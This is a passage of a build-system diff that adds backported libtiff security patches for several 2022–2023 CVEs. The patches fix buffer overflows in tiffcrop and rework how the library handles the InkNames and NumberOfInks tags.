+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ {
+ int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
+ uint32 j;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint16 bps = 0, planar;
+ uint32 nstrips;
+ uint32 strips_per_sample;
+@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
+ {
+ srcbuffs[s] = NULL;
+- buff = _TIFFmalloc(stripsize + 3);
++ buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!buff)
+ {
+ TIFFError ("readSeparateStripsIntoBuffer",
+@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ buff = srcbuffs[s];
+ strip = (s * strips_per_sample) + j;
+ bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
+- rows_this_strip = bytes_read / src_rowsize;
++ rows_this_strip = (uint32)(bytes_read / src_rowsize);
+ if (bytes_read < 0 && !ignore)
+ {
+ TIFFError(TIFFFileName(in),
+@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint16 input_compression = 0, input_photometric = 0;
+ uint16 subsampling_horiz, subsampling_vert;
+ uint32 width = 0, length = 0;
+- uint32 stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
++ tmsize_t stsize = 0, tlsize = 0, buffsize = 0;
++ tmsize_t scanlinesize = 0;
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+- uint32 tile_rowsize = 0;
++ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+ unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static uint32 prev_readsize = 0;
++ static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- new_buff = _TIFFrealloc(read_buff, buffsize+3);
++ new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ read_buff = new_buff;
+@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ dump_info (dump->infile, dump->format, "",
+ "Bits per sample %d, Samples per pixel %d", bps, spp);
+
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
+ for (i = 0; i < length; i++)
+- dump_buffer(dump->infile, dump->format, 1, scanlinesize,
++ dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize,
+ i, read_buff + (i * scanlinesize));
+ }
+ return (0);
+@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+
+ if (!sect_buff)
+ {
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!sect_buff)
+ {
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+ if (prev_sectsize < sectsize)
+ {
+- new_buff = _TIFFrealloc(sect_buff, sectsize);
++ new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (sect_buff);
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ sect_buff = new_buff;
+@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[0].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[0].buffer = crop_buff;
+ seg_buffs[0].size = cropsize;
+
+@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ cropsize = crop->bufftotal;
+ crop_buff = seg_buffs[i].buffer;
+ if (!crop_buff)
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ else
+ {
+ prev_cropsize = seg_buffs[0].size;
+ if (prev_cropsize < cropsize)
+ {
+- next_buff = _TIFFrealloc(crop_buff, cropsize);
++ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (! next_buff)
+ {
+ _TIFFfree (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = next_buff;
+@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ return (-1);
+ }
+
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ seg_buffs[i].buffer = crop_buff;
+ seg_buffs[i].size = cropsize;
+
+@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ crop_buff = *crop_buff_ptr;
+ if (!crop_buff)
+ {
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!crop_buff)
+ {
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ prev_cropsize = cropsize;
+ }
+ else
+ {
+ if (prev_cropsize < cropsize)
+ {
+- new_buff = _TIFFrealloc(crop_buff, cropsize);
++ new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (crop_buff);
+- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
++ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ crop_buff = new_buff;
+@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+ return (-1);
+ }
+- _TIFFmemset(crop_buff, 0, cropsize);
++ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ }
+
+@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ return (-1);
+ }
+
+- if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
++ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
++ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
++ TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
+- _TIFFmemset(rbuff, '\0', buffsize);
++ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ ibuff = *ibuff_ptr;
+ switch (rotation)
+@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ case MIRROR_BOTH:
+ case MIRROR_VERT:
+- line_buff = (unsigned char *)_TIFFmalloc(rowsize);
++ line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (line_buff == NULL)
+ {
+- TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
++ TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+
+ dst = ibuff + (rowsize * (length - 1));
+ for (row = 0; row < length / 2; row++)
+@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ }
+ else
+ { /* non 8 bit per sample data */
+- if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
++ if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
+ {
+ TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
+ return (-1);
+ }
++ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ bytes_per_sample = (bps + 7) / 8;
+ bytes_per_pixel = ((bps * spp) + 7) / 8;
+ if (bytes_per_pixel < (bytes_per_sample + 1))
+@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
+ {
+ row_offset = row * rowsize;
+ src = ibuff + row_offset;
+- _TIFFmemset (line_buff, '\0', rowsize);
++ _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
+ switch (shift_width)
+ {
+ case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
new file mode 100644
index 0000000000..18a4b4e0ff
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
+From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 10 May 2022 20:03:17 +0000
+Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+---
+ tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
+ 1 file changed, 42 insertions(+), 8 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c923920..a0789a3 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -103,7 +103,12 @@
+ * selects which functions dump data, with higher numbers selecting
+ * lower level, scanline level routines. Debug reports a limited set
+ * of messages to monitor progess without enabling dump logs.
+- */
++ *
++ * Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.
++ * In no case should the options be applied to a given selection successively.
++ * Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++ */
+
+ static char tiffcrop_version_id[] = "2.4.1";
+ static char tiffcrop_rev_date[] = "03-03-2010";
+@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+ #define ROTATECW_270 32
+ #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
+
+-#define CROP_NONE 0
+-#define CROP_MARGINS 1
+-#define CROP_WIDTH 2
+-#define CROP_LENGTH 4
+-#define CROP_ZONES 8
+-#define CROP_REGIONS 16
++#define CROP_NONE 0 /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
++#define CROP_MARGINS 1 /* "-m" */
++#define CROP_WIDTH 2 /* "-X" */
++#define CROP_LENGTH 4 /* "-Y" */
++#define CROP_ZONES 8 /* "-Z" */
++#define CROP_REGIONS 16 /* "-z" */
+ #define CROP_ROTATE 32
+ #define CROP_MIRROR 64
+ #define CROP_INVERT 128
+@@ -323,7 +328,7 @@ struct crop_mask {
+ #define PAGE_MODE_RESOLUTION 1
+ #define PAGE_MODE_PAPERSIZE 2
+ #define PAGE_MODE_MARGINS 4
+-#define PAGE_MODE_ROWSCOLS 8
++#define PAGE_MODE_ROWSCOLS 8 /* for -S option */
+
+ #define INVERT_DATA_ONLY 10
+ #define INVERT_DATA_AND_TAG 11
+@@ -754,6 +759,12 @@ static char* usage_info[] = {
+ " The four debug/dump options are independent, though it makes little sense to",
+ " specify a dump file without specifying a detail level.",
+ " ",
++"Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
++" In no case should the options be applied to a given selection successively.",
++" ",
++"Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
++" such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
++" ",
+ NULL
+ };
+
+@@ -2112,6 +2123,27 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+ /*NOTREACHED*/
+ }
+ }
++ /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
++ char XY, Z, R, S;
++ XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
++ Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
++ R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
++ S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
++ if (XY + Z + R + S > 1) {
++ TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
++ exit(EXIT_FAILURE);
++ }
++
++ /* Check for not allowed combination:
++ * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
++ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
++. */
++ if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
++ TIFFError("tiffcrop input error",
++ "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
++ exit(EXIT_FAILURE);
++ }
++
+ } /* end process_command_opts */
+
+ /* Start a new output file if one has not been previously opened or
+@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+
++ /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
+ if (crop.selections > 0)
+ {
+ if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
+@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
+ exit (-1);
+ }
+ }
++ /* Format and write selected image parts to output file(s). */
+ if (page.mode == PAGE_MODE_NONE)
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
new file mode 100644
index 0000000000..b3232d9002
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
+From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 30 Aug 2022 16:56:48 +0200
+Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ TIFFTAG_NUMBEROFINKS value
+
+In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
+
+Behaviour for writing:
+ `NumberOfInks` MUST fit to the number of inks in the `InkNames` string.
+ `NumberOfInks` is automatically set when `InkNames` is set.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+Behaviour for reading:
+ When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
+ If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
+ If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
+
+This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
+
+This MR will close the following issues: #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
+
+It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
+
+---
+ libtiff/tif_dir.c | 120 ++++++++++++++++++++++++-----------------
+ libtiff/tif_dir.h | 2 +
+ libtiff/tif_dirinfo.c | 2 +-
+ libtiff/tif_dirwrite.c | 5 ++
+ libtiff/tif_print.c | 4 ++
+ 5 files changed, 83 insertions(+), 50 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 39aeeb4..9d8267a 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -29,6 +29,7 @@
+ * (and also some miscellaneous stuff)
+ */
+ #include "tiffiop.h"
++# include <inttypes.h>
+
+ /*
+ * These are used in the backwards compatibility code...
+@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
+ }
+
+ /*
+- * Confirm we have "samplesperpixel" ink names separated by \0. Returns
++ * Count ink names separated by \0. Returns
+ * zero if the ink names are not as expected.
+ */
+-static uint32
+-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
++static uint16
++countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+- TIFFDirectory* td = &tif->tif_dir;
+- uint16 i = td->td_samplesperpixel;
++ uint16 i = 0;
++ const char *ep = s + slen;
++ const char *cp = s;
+
+ if (slen > 0) {
+- const char* ep = s+slen;
+- const char* cp = s;
+- for (; i > 0; i--) {
++ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+ goto bad;
+ cp++; /* skip \0 */
+- }
+- return ((uint32)(cp-s));
++ i++;
++ } while (cp < ep);
++ return (i);
+ }
+ bad:
+ TIFFErrorExt(tif->tif_clientdata, "TIFFSetField",
+- "%s: Invalid InkNames value; expecting %d names, found %d",
+- tif->tif_name,
+- td->td_samplesperpixel,
+- td->td_samplesperpixel-i);
++ "%s: Invalid InkNames value; no NUL at given buffer end location %"PRIu32", after %"PRIu16" ink",
++ tif->tif_name, slen, i);
+ return (0);
+ }
+
+@@ -476,13 +475,61 @@ _TIFFVSetField(TIFF* tif, uint32 tag, va_list ap)
+ _TIFFsetFloatArray(&td->td_refblackwhite, va_arg(ap, float*), 6);
+ break;
+ case TIFFTAG_INKNAMES:
+- v = (uint16) va_arg(ap, uint16_vap);
+- s = va_arg(ap, char*);
+- v = checkInkNamesString(tif, v, s);
+- status = v > 0;
+- if( v > 0 ) {
+- _TIFFsetNString(&td->td_inknames, s, v);
+- td->td_inknameslen = v;
++ {
++ v = (uint16) va_arg(ap, uint16_vap);
++ s = va_arg(ap, char*);
++ uint16 ninksinstring;
++ ninksinstring = countInkNamesString(tif, v, s);
++ status = ninksinstring > 0;
++ if(ninksinstring > 0 ) {
++ _TIFFsetNString(&td->td_inknames, s, v);
++ td->td_inknameslen = v;
++ /* Set NumberOfInks to the value ninksinstring */
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (td->td_numberofinks != ninksinstring) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n -> NumberOfInks value adapted to %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
++ td->td_numberofinks = ninksinstring;
++ }
++ } else {
++ td->td_numberofinks = ninksinstring;
++ TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
++ }
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
++ }
++ }
++ }
++ }
++ break;
++ case TIFFTAG_NUMBEROFINKS:
++ v = (uint16)va_arg(ap, uint16_vap);
++ /* If InkNames already set also NumberOfInks is set accordingly and should be equal */
++ if (TIFFFieldSet(tif, FIELD_INKNAMES))
++ {
++ if (v != td->td_numberofinks) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Error %s; Tag %s:\n It is not possible to set the value %"PRIu32" for NumberOfInks\n which is different from the number of inks in the InkNames tag (%"PRIu16")",
++ tif->tif_name, fip->field_name, v, td->td_numberofinks);
++ /* Do not set / overwrite number of inks already set by InkNames case accordingly. */
++ status = 0;
++ }
++ } else {
++ td->td_numberofinks = (uint16)v;
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
++ }
++ }
+ }
+ break;
+ case TIFFTAG_PERSAMPLE:
+@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ if (fip->field_bit == FIELD_CUSTOM) {
+ standard_tag = 0;
+ }
+-
+- if( standard_tag == TIFFTAG_NUMBEROFINKS )
+- {
+- int i;
